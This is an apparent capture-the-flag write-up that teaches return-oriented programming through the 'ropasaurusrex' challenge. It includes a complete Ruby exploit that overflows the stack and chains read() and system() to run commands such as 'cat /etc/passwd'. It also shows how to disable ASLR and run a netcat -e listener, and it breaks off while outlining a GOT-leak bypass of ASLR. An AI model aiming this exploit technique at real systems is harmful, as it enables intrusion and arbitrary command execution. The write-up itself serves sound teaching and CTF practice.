ropasaurusrex: a primer on return-oriented programming

One of the worst feelings when playing a capture-the-flag challenge is the hindsight problem. You spend a few hours on a level—nothing like the amount of time I spent on cnot, not by a fraction—and realize that it was actually pretty easy. But also a brainfuck. That’s what ROP’s all about, after all!

Anyway, even though I spent a lot of time working on the wrong solution (specifically, I didn’t think to bypass ASLR for quite a while), the route we took, solving the level first without ASLR and then with it, is actually a good way to teach the technique, so I’ll take the same route in this post.

Before I say anything else, I have to thank HikingPete for being my wingman on this one. Thanks to him, we solved this puzzle much more quickly and, for a short time, were in 3rd place worldwide! Coincidentally, I’ve been meaning to write a post on ROP for some time now. I even wrote a vulnerable demo program that I was going to base this on! But, since PlaidCTF gave us this challenge, I thought I’d talk about it instead! This isn’t just a writeup, this is designed to be a fairly in-depth primer on return-oriented programming! If you’re more interested in the process of solving a CTF level, have a look at my writeup of cnot. :)

What the heck is ROP?

ROP (return-oriented programming) is a modern name for a classic exploit called “return into libc”. The idea is that you’ve found an overflow or other type of vulnerability in a program that lets you take control, but you have no reliable way to get your code into executable memory (DEP, or data execution prevention, means that you can’t run code from anywhere you want anymore).

With ROP, you can pick and choose pieces of code that are already in executable memory and are followed by a ‘return’. Sometimes those pieces are simple, and sometimes they’re complicated. In this exercise, we only need the simple stuff, thankfully!

But, we’re getting ahead of ourselves. Let’s first learn a little more about the stack! I’m not going to spend a ton of time explaining the stack, so if this is unclear, please check out my assembly tutorial.

The stack

I’m sure you’ve heard of the stack before. Stack overflows? Smashing the stack? But what’s it actually mean? If you already know, feel free to treat this as a quick primer, or to just skip right to the next section. Up to you!

The simple idea is, let’s say function A() calls function B() with two parameters, 1 and 2. Then B() calls C() with two parameters, 3 and 4. When you’re in C(), the stack looks like this:

+----------------------+
|         ...          | (higher addresses)
+----------------------+

+----------------------+ <-- start of 'A's stack frame
|   [return address]   | <-- address of whatever called 'A'
+----------------------+
|   [frame pointer]    |
+----------------------+
|   [local variables]  |
+----------------------+

+----------------------+ <-- start of 'B's stack frame
|         2 (parameter)|
+----------------------+
|         1 (parameter)|
+----------------------+
|   [return address]   | <-- the address that 'B' returns to
+----------------------+
|   [frame pointer]    |
+----------------------+
|   [local variables]  | 
+----------------------+

+----------------------+ <-- start of 'C's stack frame
|         4 (parameter)|
+----------------------+
|         3 (parameter)|
+----------------------+
|   [return address]   | <-- the address that 'C' returns to
+----------------------+

+----------------------+
|         ...          | (lower addresses)
+----------------------+

This is quite a mouthful (eyeful?) if you don’t live and breathe all the time at this depth, so let me explain a bit. Every time you call a function, a new “stack frame” is built. A “frame” is simply some memory that the function allocates for itself on the stack. In fact, it doesn’t even allocate it, it just adds stuff to the end and updates the esp register so any functions it calls know where its own stack frame needs to start (esp, the stack pointer, is basically a variable).

This stack frame holds the context for the current function, and lets you easily a) build frames for new functions being called, and b) return to previous frames (i.e., return from functions). esp (the stack pointer) moves up and down, but always points to the top of the stack (the lowest address).

Have you ever wondered where a function’s local variables go when you call another function (or, better yet, you call the same function again recursively)? Of course not! But if you did, now you’d know: they wind up in an old stack frame that we return to later!

Now, let’s look at what’s stored on the stack, in the order it gets pushed (note that, confusingly, you can draw a stack either way; in this document, the stack grows from top to bottom, so the older/callers are on top and the newer/callees are on the bottom):

Parameters: The parameters that were passed into the function by the caller—these are extremely important with ROP.
Return address: Every function needs to know where to go when it's done. When you call a function, the address of the instruction right after the call is pushed onto the stack prior to entering the new function. When you return, the address is popped off the stack and is jumped to. This is extremely important with ROP.
Saved frame pointer: Let's totally ignore this. Seriously. It's just something that compilers typically do, except when they don't, and we won't speak of it again.
Local variables: A function can allocate as much memory as it needs (within reason) to store local variables. They go here. They don't matter at all for ROP and can be safely ignored.

So, to summarize: when a function is called, parameters are pushed onto the stack, followed by the return address. When the function returns, it grabs the return address off the stack and jumps to it. The parameters pushed onto the stack are removed by the calling function, except when they’re not. We’re going to assume the caller cleans up (that is, the function doesn’t clean up after itself), since that’s how it works in this challenge (and most of the time on Linux).

Heaven, hell, and stack frames

The main thing you have to understand to know ROP is this: a function’s entire universe is its stack frame. The stack is its god, the parameters are its commandments, local variables are its sins, the saved frame pointer is its bible, and the return address is its heaven (okay, probably hell). It’s all right there in the Book of Intel, chapter 3, verses 19 - 26 (note: it isn’t actually, don’t bother looking).

Let’s say you call the sleep() function, and get to the first line; its stack frame is going to look like this:

          ...            <-- don't know, don't care territory (higher addresses)
+----------------------+
|      [seconds]       |
+----------------------+
|   [return address]   | <-- esp points here
+----------------------+
          ...            <-- not allocated, don't care territory (lower addresses)

When sleep() starts, this stack frame is all it sees. It can save a frame pointer (crap, that’s twice I’ve mentioned it since I promised not to; I swear I won’t mention it again) and make room for local variables by subtracting the number of bytes it wants from esp (i.e., making esp point to a lower address). It can call other functions, which create new frames under esp. It can do many different things; what matters is that, when sleep() starts, the stack frame makes up its entire world.

When sleep() returns, it winds up looking like this:

          ...            <-- don't know, don't care territory (higher addresses)
+----------------------+
|      [seconds]       | <-- esp points here
+----------------------+
| [old return address] | <-- not allocated, don't care territory starts here now
+----------------------+
          ...            (lower addresses)

And, of course, the caller, after sleep() returns, will remove “seconds” from the stack by adding 4 to esp (later on, we’ll talk about how we have to use pop/pop/ret constructs to do the same thing).

In a properly working system, this is how life works. That’s a safe assumption. The “seconds” value would only be on the stack if it was pushed, and the return address is going to point to the place it was called from. Duh. How else would it get there?

Controlling the stack

…well, since you asked, let me tell you. We’ve all heard of a “stack overflow” (more precisely, a stack-based buffer overflow), which involves writing past the end of a variable on the stack and overwriting whatever comes after it. What’s that mean? Well, let’s say we have a frame that looks like this:

          ...            <-- don't know, don't care territory (higher addresses)
+----------------------+
|      [seconds]       |
+----------------------+
|   [return address]   | <-- esp points here
+----------------------+
|     char buf[16]     |
|                      |
|                      |
|                      |
+----------------------+
          ...            (lower addresses)

The variable buf is 16 bytes long. What happens if a program tries to write to the 17th byte of buf (i.e., buf[16])? Well, it writes to the first byte of the return address, the one at the lowest address. Because x86 is little endian, that’s the return address’s least significant byte. The 18th byte writes to the next byte of the return address, and so on. Therefore, we can change the return address to point anywhere we want. Anywhere we want. So when the function returns, where does it go? Well, it thinks it’s going where it’s supposed to go (in a perfect world, it would be), but nope! In this case, it’s going wherever the attacker wants it to. If the attacker says to jump to 0, it jumps to 0 and crashes. If the attacker says to go to 0x41414141 (“AAAA”), it jumps there and probably crashes. If the attacker says to jump to the stack… well, that’s where it gets more complicated…
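To make the little-endian detail concrete, here is a small Ruby model of the frame in the diagram: 16 bytes of buf followed directly by a 4-byte return address, with the saved frame pointer ignored as promised. The return address value 0x08048500 is made up purely for illustration.

```ruby
# 16 bytes of buf followed by a little-endian return address.
# 0x08048500 is a hypothetical return address, not one from the challenge.
frame = ("\x00" * 16 + [0x08048500].pack("V")).b

def return_address(frame)
  frame[16, 4].unpack("V").first
end

# Writing one byte past the end of buf (buf[16]) hits the lowest-addressed
# byte of the return address, which on x86 is its least significant byte.
frame.setbyte(16, 0x41)
puts format("0x%08x", return_address(frame))   # => 0x08048541

# Writing all four bytes after buf replaces the whole address.
frame[16, 4] = "AAAA"
puts format("0x%08x", return_address(frame))   # => 0x41414141
```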

DEP

Traditionally, an attacker would change the return address to point to the stack, since the attacker already has the ability to put code on the stack (after all, code is just a bunch of bytes!). But because it was such a common and easy way to exploit systems, those assholes at OS companies (just kidding, I love you guys :) ) put a stop to it by introducing data execution prevention, or DEP. On any DEP-enabled system, you can no longer run code on the stack (or, more generally, anywhere an attacker can write); if you try, it crashes.

So how the hell do I run code without being allowed to run code!?

Well, we’re going to get to that. But first, let’s look at the vulnerability that the challenge uses!

The vulnerability

Here’s the vulnerable function, fresh from IDA:

.text:080483F4 vulnerable_function proc near
.text:080483F4
.text:080483F4 buf             = byte ptr -88h
.text:080483F4
.text:080483F4         push    ebp
.text:080483F5         mov     ebp, esp
.text:080483F7         sub     esp, 98h
.text:080483FD         mov     dword ptr [esp+8], 100h ; nbytes
.text:08048405         lea     eax, [ebp+buf]
.text:0804840B         mov     [esp+4], eax    ; buf
.text:0804840F         mov     dword ptr [esp], 0 ; fd
.text:08048416         call    _read
.text:0804841B         leave
.text:0804841C         retn
.text:0804841C vulnerable_function endp

Now, if you don’t know assembly, this might look daunting. But, in fact, it’s simple. Here’s the equivalent C:

ssize_t __cdecl vulnerable_function()
{
  char buf[136];
  return read(0, buf, 256);
}

So, it reads 256 bytes into a 136-byte buffer. Goodbye Mr. Stack!
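The listing also tells us exactly where the return address sits, without any guessing. A quick sketch of the arithmetic, assuming the push ebp / mov ebp, esp prologue shown above (so the saved ebp occupies 4 bytes between buf and the return address):

```ruby
# Values taken from the IDA listing above.
buf_offset = 0x88    # buf = byte ptr -88h, i.e. buf starts at ebp - 0x88
saved_ebp  = 4       # "push ebp" left the caller's ebp at [ebp]
read_len   = 0x100   # nbytes passed to read()

# The return address sits just above the saved ebp, at ebp + 4.
ret_offset = buf_offset + saved_ebp
# Bytes of input left over after the 4-byte return address itself.
room = read_len - (ret_offset + 4)

puts "return address starts #{ret_offset} bytes into the input"   # 140
puts "#{room} bytes (#{room / 4} dwords) remain after it for the ROP chain"   # 112, 28
```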

You can easily validate that by running it, piping in a bunch of ‘A’s, and seeing what happens:

ron@debian-x86 ~ $ ulimit -c unlimited
ron@debian-x86 ~ $ perl -e "print 'A'x300" | ./ropasaurusrex
Segmentation fault (core dumped)
ron@debian-x86 ~ $ gdb ./ropasaurusrex core
[...]
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb)

Simply speaking, it means that we overwrote the return address with the letter A 4 times (0x41414141 = “AAAA”).

Now, there are good ways and bad ways to figure out exactly what you control. I used a bad way. I put “BBBB” at the end of my buffer and simply removed ‘A’s until it crashed at 0x42424242 (“BBBB”):

ron@debian-x86 ~ $ perl -e "print 'A'x140;print 'BBBB'" | ./ropasaurusrex
Segmentation fault (core dumped)
ron@debian-x86 ~ $ gdb ./ropasaurusrex core
#0  0x42424242 in ?? ()

If you want to do this “better” (by which I mean, slower), check out Metasploit’s pattern_create.rb and pattern_offset.rb. They’re great when guessing is a slow process, but for the purpose of this challenge it was so quick to guess and check that I didn’t bother.
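If you’d rather not guess, the idea behind those Metasploit scripts is easy to sketch: send a string in which every 4-byte chunk is distinctive (the familiar Aa0Aa1Aa2... sequence), then look up where the crashing address appears in it. The helper names cyclic_pattern and cyclic_offset are hypothetical, and this is a minimal reimplementation of the idea, not Metasploit’s code:

```ruby
# Build "Aa0Aa1Aa2...Ab0..." (uppercase, lowercase, digit) up to `length` bytes.
def cyclic_pattern(length)
  out = String.new
  ("A".."Z").each do |upper|
    ("a".."z").each do |lower|
      ("0".."9").each do |digit|
        out << upper << lower << digit
        return out[0, length] if out.length >= length
      end
    end
  end
  out # the full sequence is only 26 * 26 * 10 * 3 = 20280 bytes long
end

# Given the crashing EIP from gdb, find where those 4 bytes sit in the pattern.
# EIP is read from memory little-endian, so pack it back the same way.
def cyclic_offset(eip, length = 20280)
  cyclic_pattern(length).index([eip].pack("V"))
end
```

With a 300-byte pattern, this binary would crash at 0x37654136 (the bytes "6Ae7"), and cyclic_offset(0x37654136, 300) returns 140, the same answer as guessing and checking.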

Starting to write an exploit

The first thing you should do is start running ropasaurusrex as a network service. The folks who wrote the CTF used xinetd to do this, but we’re going to use netcat, which is just as good (for our purposes):

$ while true; do nc -vv -l -p 4444 -e ./ropasaurusrex; done
listening on [any] 4444 ...

From now on, we can use localhost:4444 as the target for our exploit and test whether it works before pointing it at the actual server.

You may also want to disable ASLR if you’re following along:

$ sudo sysctl -w kernel.randomize_va_space=0

Note that this will make your system easier to exploit, so I don’t recommend doing this outside of a lab environment!

Here’s some Ruby code for the initial exploit:

$ cat ./sploit.rb
require 'socket'

s = TCPSocket.new("localhost", 4444)

# Generate the payload
payload = "A"*140 +
  [
    0x42424242,
  ].pack("I*") # Convert a series of 'ints' to a string

s.write(payload)
s.close()

Run that with ruby ./sploit.rb and you should see the service crash:

connect to [127.0.0.1] from debian-x86.skullseclabs.org [127.0.0.1] 53451
Segmentation fault (core dumped)

And you can verify, using gdb, that it crashed at the right location:

gdb --quiet ./ropasaurusrex core
[...]
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()

We now have the beginning of an exploit!
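One detail in that payload: pack("I*") packs native unsigned ints, so it relies on the exploit running on a little-endian machine with 32-bit ints, which is true on x86. pack("V*") always produces 32-bit little-endian values, which is what the target expects regardless of where the exploit runs. A quick comparison, using vulnerable_function’s address from the IDA listing as an example value:

```ruby
# "I" is a native unsigned int: native size and native byte order.
# "V" is always a 32-bit little-endian value, which is what x86 expects.
words = [0x42424242, 0x080483F4]   # filler, and vulnerable_function's address

native = words.pack("I*")
little = words.pack("V*")

puts little.bytes.map { |b| format("%02x", b) }.join(" ")
# => 42 42 42 42 f4 83 04 08
puts native == little   # true on little-endian hosts with 32-bit ints
```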

How to waste time with ASLR

I called this section ‘wasting time’, because I didn’t realize—at the time—that ASLR was enabled. However, assuming no ASLR actually makes this a much more instructive puzzle. So for now, let’s not worry about ASLR—in fact, let’s not even define ASLR. That’ll come up in the next section.

Okay, so what do we want to do? We have a vulnerable process, and we have the libc shared library. What’s the next step?

Well, our ultimate goal is to run system commands. Because stdin and stdout are both hooked up to the socket, if we could run, for example, system(“cat /etc/passwd”), we’d be set! Once we do that, we can run any command. But doing that involves two things:

Getting the string cat /etc/passwd into memory somewhere
Running the system() function

Getting the string into memory

Getting the string into memory actually involves two sub-steps:

Find some memory that we can write to
Find a function that can write to it

Tall order? Not really! First things first, let’s find some memory that we can read and write! The most obvious place is the .data section:

ron@debian-x86 ~ $ objdump -x ropasaurusrex  | grep -A1 '\.data'
 23 .data         00000008  08049620  08049620  00000620  2**2
                  CONTENTS, ALLOC, LOAD, DATA

Uh oh, .data is only 8 bytes long. That’s not enough! In theory, any region that’s big enough, writable, and unused will do. Looking at the output of objdump -x, I see a section called .dynamic that seems to fit the bill:

 20 .dynamic      000000d0  08049530  08049530  00000530  2**2
                  CONTENTS, ALLOC, LOAD, DATA

The .dynamic section holds information for dynamic linking. We don’t need that for what we’re going to do, so let’s choose address 0x08049530 to overwrite.

The next step is to find a function that can write our command string to address 0x08049530. The most convenient functions to use are the ones the executable itself already references, rather than ones we’d have to find in a library, since their addresses in the executable won’t change from system to system. Let’s look at what we have:

ron@debian-x86 ~ $ objdump -R ropasaurusrex

ropasaurusrex:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049600 R_386_GLOB_DAT    __gmon_start__
08049610 R_386_JUMP_SLOT   __gmon_start__
08049614 R_386_JUMP_SLOT   write
08049618 R_386_JUMP_SLOT   __libc_start_main
0804961c R_386_JUMP_SLOT   read

So, we have read() and write() immediately available. That’s helpful! The read() function will read data from the socket and write it to memory. The prototype looks like this:

ssize_t read(int fd, void *buf, size_t count);

This means that, when you enter the read() function, you want the stack to look like this:

+----------------------+
|         ...          | - doesn't matter, other funcs will go here
+----------------------+

+----------------------+ <-- start of read()'s stack frame
|     size_t count     | - count, strlen("cat /etc/passwd")
+----------------------+
|      void *buf       | - writable memory, 0x08049530
+----------------------+
|        int fd        | - should be 'stdin' (0)
+----------------------+
|   [return address]   | - where 'read' will return
+----------------------+

+----------------------+
|         ...          | - doesn't matter, read() will use for locals
+----------------------+

We update our exploit to look like this (explanations are in the comments):

$ cat sploit.rb
require 'socket'

s = TCPSocket.new("localhost", 4444)

# The command we'll run
cmd = ARGV[0] + "\0"

# From objdump -x
buf = 0x08049530

# From objdump -D ./ropasaurusrex | grep read
read_addr = 0x0804832C
# From objdump -D ./ropasaurusrex | grep write
write_addr = 0x0804830C

# Generate the payload
payload = "A"*140 +
  [
    cmd.length, # number of bytes
    buf,        # writable memory
    0,          # stdin
    0x43434343, # read's return address

    read_addr # Overwrite the original return
  ].reverse.pack("I*") # Convert a series of 'ints' to a string

# Write the 'exploit' payload
s.write(payload)

# When our payload calls read() the first time, this is read
s.write(cmd)

# Clean up
s.close()

We run that against the target:

ron@debian-x86 ~ $ ruby sploit.rb "cat /etc/passwd"

And verify that it crashes:

listening on [any] 4444 ...
connect to [127.0.0.1] from debian-x86.skullseclabs.org [127.0.0.1] 53456
Segmentation fault (core dumped)

Then verify that it crashed at the return address of read() (0x43434343) and wrote the command to the memory at 0x08049530:

$ gdb --quiet ./ropasaurusrex core
[...]
Program terminated with signal 11, Segmentation fault.
#0  0x43434343 in ?? ()
(gdb) x/s 0x08049530
0x8049530:       "cat /etc/passwd"

Perfect!
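The .reverse in the exploit exists because the diagrams (and the array) list the highest address first, while the overflow writes upward from the overwritten return address. This sketch packs the same frame and prints each dword with its offset from the return address; it uses pack("V*"), the explicit little-endian form of the post’s pack("I*") on x86:

```ruby
cmd       = "cat /etc/passwd\0"
buf       = 0x08049530   # .dynamic, from objdump -x
read_addr = 0x0804832C   # read@plt

# Same order as the exploit's array and the diagrams: highest address first.
frame = [cmd.length, buf, 0, 0x43434343, read_addr]

# The overflow writes upward starting at the saved return address, so the
# lowest-addressed dword (read_addr) has to be packed first.
chain = frame.reverse.pack("V*")

chain.unpack("V*").each_with_index do |word, i|
  puts format("ret+%-3d 0x%08x", i * 4, word)
end
```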

Running it

Now that we’ve written cat /etc/passwd into memory, we need to call system() and point it at that address. It turns out, if we assume ASLR is off, this is easy. We know that the executable is linked with libc:

$ ldd ./ropasaurusrex
        linux-gate.so.1 =>  (0xb7703000)
        libc.so.6 => /lib/i686/cmov/libc.so.6 (0xb75aa000)
        /lib/ld-linux.so.2 (0xb7704000)

And libc.so.6 contains the system() function:

$ objdump -T /lib/i686/cmov/libc.so.6 | grep system
000f5470 g    DF .text  00000042  GLIBC_2.0   svcerr_systemerr
00039450 g    DF .text  0000007d  GLIBC_PRIVATE __libc_system
00039450  w   DF .text  0000007d  GLIBC_2.0   system

We can figure out the address where system() ends up loaded in ropasaurusrex in our debugger:

$ gdb --quiet ./ropasaurusrex core
[...]
Program terminated with signal 11, Segmentation fault.
#0  0x43434343 in ?? ()
(gdb) x/x system
0xb7ec2450 <system>:    0x890cec83
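That gdb address is just libc’s load address plus the offset objdump reported for system(). Subtracting the two recovers the base this particular run used, which should be page-aligned. A small sketch of the arithmetic (the base is inferred from these two numbers, not read from anywhere):

```ruby
SYSTEM_OFFSET = 0x39450      # objdump -T: offset of system() inside libc.so.6
system_addr   = 0xb7ec2450   # gdb: "x/x system" with ASLR disabled

libc_base = system_addr - SYSTEM_OFFSET
puts format("libc base: 0x%08x", libc_base)   # => libc base: 0xb7e89000
puts((libc_base % 0x1000).zero?)              # => true (page-aligned)
```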

Because system() only takes one argument, building the stack frame is pretty easy:

+----------------------+
|         ...          | - doesn't matter, other funcs will go here
+----------------------+

+----------------------+ <-- Start of system()'s stack frame
|      void *arg       | - our buffer, 0x08049530
+----------------------+
|   [return address]   | - where 'system' will return
+----------------------+
|         ...          | - doesn't matter, system() will use for locals
+----------------------+

Now if we stack this on top of our read() frame, things are looking pretty good:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s stack frame
|      void *arg       |
+----------------------+
|   [return address]   |
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     |
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        |
+----------------------+
| [address of system]  | <-- Stack pointer
+----------------------+

+----------------------+
|         ...          |
+----------------------+

Just before read() returns, the stack pointer points at its return address, as shown above. The ret instruction pops that address off the stack and jumps to it, so by the time we land in system(), the stack looks like this:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       |
+----------------------+
|   [return address]   |
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     |
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        | <-- Stack pointer
+----------------------+
| [address of system]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

Uh oh, that’s no good! The stack pointer is pointing to the middle of read()’s frame when we enter system(), not to the bottom of system()’s frame like we want it to! What do we do?

Well, when we perform a ROP exploit, there’s a very important construct we need called pop/pop/ret. In this case, it’s actually pop/pop/pop/ret, which we’ll call “pppr” for short. Just remember: it’s enough “pops” to clear the previous function’s arguments off the stack, followed by a return.

pop/pop/pop/ret is a construct that we use to remove the stuff we don’t want off the stack. Since read() has three arguments, we need to pop all three of them off the stack, then return. To demonstrate, here’s what the stack looks like immediately after read() returns to a pop/pop/pop/ret:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       |
+----------------------+
|   [return address]   |
+----------------------+

+----------------------+ <-- Special frame for pop/pop/pop/ret
| [address of system]  |
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     |
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        | <-- Stack pointer
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

After the three pops run, but before the ret executes, we get this:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       |
+----------------------+
|   [return address]   |
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame
| [address of system]  | <-- stack pointer
+----------------------+

+----------------------+
|     size_t count     | <-- read()'s frame
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        |
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

Then when it returns, we’re exactly where we want to be:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       |
+----------------------+
|   [return address]   | <-- stack pointer
+----------------------+

+----------------------+ <-- pop/pop/pop/ret's frame
| [address of system]  |
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     |
+----------------------+
|      void *buf       |
+----------------------+
|        int fd        |
+----------------------+
| [address of "pppr"]  |
+----------------------+

+----------------------+
|         ...          |
+----------------------+

Finding a pop/pop/pop/ret is pretty easy using objdump:

$ objdump -d ./ropasaurusrex | egrep 'pop|ret'
[...]
 80484b5:       5b                      pop    ebx
 80484b6:       5e                      pop    esi
 80484b7:       5f                      pop    edi
 80484b8:       5d                      pop    ebp
 80484b9:       c3                      ret

This lets us remove between 1 and 4 arguments off the stack before executing the next function. Perfect!

And remember, if you’re doing this yourself, make sure the pops are at consecutive addresses and end in the ret. Because egrep shows matching lines with no context, it can happily show you pops that aren’t actually next to each other.
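Checking that the pops really are back-to-back can be done on the raw bytes objdump printed. On x86, a single-byte pop r32 is opcode 0x58 plus the register number, so this sketch walks backwards from the ret and lists every usable entry point. It only understands those one-byte pops, not arbitrary instructions:

```ruby
# pop r32 encodes as 0x58 + register number (eax = 0 ... edi = 7).
REGS = %w[eax ecx edx ebx esp ebp esi edi]

# Bytes at 0x080484b5..0x080484b9, as shown by objdump above.
base  = 0x080484b5
bytes = [0x5b, 0x5e, 0x5f, 0x5d, 0xc3]

ret_index = bytes.index(0xc3)

# Walk backwards from the ret while the preceding bytes are one-byte pops.
start = ret_index
start -= 1 while start > 0 && (0x58..0x5f).cover?(bytes[start - 1])

# Every address from `start` up to the ret is a valid gadget entry point.
gadgets = (start...ret_index).map do |i|
  pops = bytes[i...ret_index].map { |b| "pop #{REGS[b - 0x58]}" }
  [base + i, (pops + ["ret"]).join("; ")]
end

gadgets.each { |addr, text| puts format("0x%08x: %s", addr, text) }
```

Running it lists four entry points, from 0x080484b5 (four pops) down to 0x080484b8 (a single pop ebp), which is where the “between 1 and 4 arguments” comes from.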

So now, if we want a triple pop and a ret (to remove the three arguments that read() used), we want the address 0x80484b6, so we set up our stack like this:

+----------------------+
|         ...          |
+----------------------+

+----------------------+ <-- Start of system()'s frame
|      void *arg       | - 0x08049530 (buf)
+----------------------+
|   [return address]   | - 0x44444444
+----------------------+

+----------------------+
| [address of system]  | - 0xb7ec2450
+----------------------+

+----------------------+ <-- Start of read()'s frame
|     size_t count     | - strlen(cmd)
+----------------------+
|      void *buf       | - 0x08049530 (buf)
+----------------------+
|        int fd        | - 0 (stdin)
+----------------------+
| [address of "pppr"]  | - 0x080484b6
+----------------------+

+----------------------+
|         ...          |
+----------------------+
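To convince yourself the chain lines up, here is a toy simulation of the stack in the diagram above, one array element per 4-byte slot with index 0 at the lowest address. It is a hypothetical model, not real CPU emulation: it starts right after read()’s ret has popped the pppr address, then performs the gadget’s three pops and its ret:

```ruby
# One element per 4-byte stack slot, index 0 = lowest address.
stack = [
  0x080484b6, # read()'s return address: the pppr gadget
  0,          # read(): fd (stdin)
  0x08049530, # read(): buf
  16,         # read(): count, cmd.length ("cat /etc/passwd" plus the NUL)
  0xb7ec2450, # pppr's return address: system()
  0x44444444, # system()'s return address
  0x08049530, # system()'s argument: buf
]

esp = 1   # read()'s ret has just popped slot 0 and jumped to pppr

# Each pop reads the slot at esp and moves esp up by one slot (4 bytes).
pop = lambda do
  value = stack[esp]
  esp += 1
  value
end

3.times { pop.call }   # pop esi; pop edi; pop ebp (values thrown away)
eip = pop.call         # ret: pop the next address and jump there

puts format("jumping to 0x%08x", eip)
puts format("system() sees return address 0x%08x and argument 0x%08x",
            stack[esp], stack[esp + 1])
```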

We also update our exploit with a s.read() at the end, to read whatever data the remote server sends us. The current exploit now looks like:

require 'socket'

s = TCPSocket.new("localhost", 4444)

# The command we'll run
cmd = ARGV[0] + "\0"

# From objdump -x
buf = 0x08049530

# From objdump -D ./ropasaurusrex | grep read
read_addr = 0x0804832C
# From objdump -D ./ropasaurusrex | grep write
write_addr = 0x0804830C
# From gdb, "x/x system"
system_addr = 0xb7ec2450
# From objdump, "pop/pop/pop/ret"
pppr_addr = 0x080484b6

# Generate the payload
payload = "A"*140 +
  [
    # system()'s stack frame
    buf,         # writable memory (cmd buf)
    0x44444444,  # system()'s return address

    # pop/pop/pop/ret's stack frame
    system_addr, # pop/pop/pop/ret's return address

    # read()'s stack frame
    cmd.length,  # number of bytes
    buf,         # writable memory (cmd buf)
    0,           # stdin
    pppr_addr,   # read()'s return address

    read_addr # Overwrite the original return
  ].reverse.pack("I*") # Convert a series of 'ints' to a string

# Write the 'exploit' payload
s.write(payload)

# When our payload calls read() the first time, this is read
s.write(cmd)

# Read the response from the command and print it to the screen
puts(s.read)

# Clean up
s.close()

And when we run it, we get the expected result:

$ ruby sploit.rb "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
...

And if you look at the core dump, you’ll see it’s crashing at 0x44444444 as expected.

Done, right?

WRONG!

This exploit worked perfectly against my test machine with ASLR off, but once ASLR is enabled, it fails:

$ sudo sysctl -w kernel.randomize_va_space=1
kernel.randomize_va_space = 1
ron@debian-x86 ~ $ ruby sploit.rb "cat /etc/passwd"

This is where it starts to get a little more complicated. Let’s go!

What is ASLR?

ASLR, or address space layout randomization, is a defense implemented on nearly every modern system (FreeBSD was a notable holdout when this was written) that randomizes the addresses where libraries, among other things, are loaded. As an example, let’s run ropasaurusrex twice and get the address of system():

ron@debian-x86 ~ $ perl -e 'printf "A"x1000' | ./ropasaurusrex
Segmentation fault (core dumped)
ron@debian-x86 ~ $ gdb ./ropasaurusrex core
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/x system
0xb766e450 <system>:    0x890cec83

ron@debian-x86 ~ $ perl -e 'printf "A"x1000' | ./ropasaurusrex
Segmentation fault (core dumped)
ron@debian-x86 ~ $ gdb ./ropasaurusrex core
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/x system
0xb76a7450 <system>:    0x890cec83

Notice that the address of system() changes from 0xb766e450 to 0xb76a7450. That’s a problem!
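Those two addresses differ, but not arbitrarily. Subtracting system()’s offset from the earlier objdump -T output shows the whole library slid by a page-aligned amount, so the low 12 bits stay the same and the distance between any two functions inside libc doesn’t change. That constant distance is what the rest of this post relies on. A sketch of the arithmetic:

```ruby
SYSTEM_OFFSET = 0x39450          # from objdump -T, as before
runs = [0xb766e450, 0xb76a7450]  # system() in the two crashes above

runs.each do |addr|
  puts format("system 0x%08x  libc base 0x%08x  low 12 bits 0x%03x",
              addr, addr - SYSTEM_OFFSET, addr & 0xfff)
end

# The library moved as a whole, by a multiple of the 4 KiB page size.
puts format("libc moved by 0x%x bytes", runs[1] - runs[0])
```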

Defeating ASLR

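So, what do we know? Well, the binary itself isn’t randomized (it isn’t built as a position-independent executable), which means we can rely on every address in it staying put, which is useful. Most importantly, the slots listed in the relocation table, which hold pointers to library functions, stay at the same addresses: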

$ objdump -R ./ropasaurusrex

./ropasaurusrex:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049600 R_386_GLOB_DAT    __gmon_start__
08049610 R_386_JUMP_SLOT   __gmon_start__
08049614 R_386_JUMP_SLOT   write
08049618 R_386_JUMP_SLOT   __libc_start_main
0804961c R_386_JUMP_SLOT   read

So we know where in the binary the pointers to read() and write() are stored (0x0804961c and 0x08049614). What does that mean? Let’s take a look at their values while the binary is running:

$ gdb ./ropasaurusrex
(gdb) run
^C
Program received signal SIGINT, Interrupt.
0xb7fe2424 in __kernel_vsyscall ()
(gdb) x/x 0x0804961c
0x804961c:      0xb7f48110
(gdb) print read
$1 = {<text variable, no debug info>} 0xb7f48110 <read>

Well, look at that: a pointer to read() at a memory address that we know! What can we do with that, I wonder…? I’ll give you a hint: we can use the write() function, whose address we also know, to grab data from arbitrary memory and write it to the socket.

Finally, running some code!

Okay, let’s break this down into steps. We need to:

Copy a command into memory using the read() function.
Get the address of the read() function using the write() function.
Calculate the offset between read() and system(), which lets us get the address of system().
Call system().
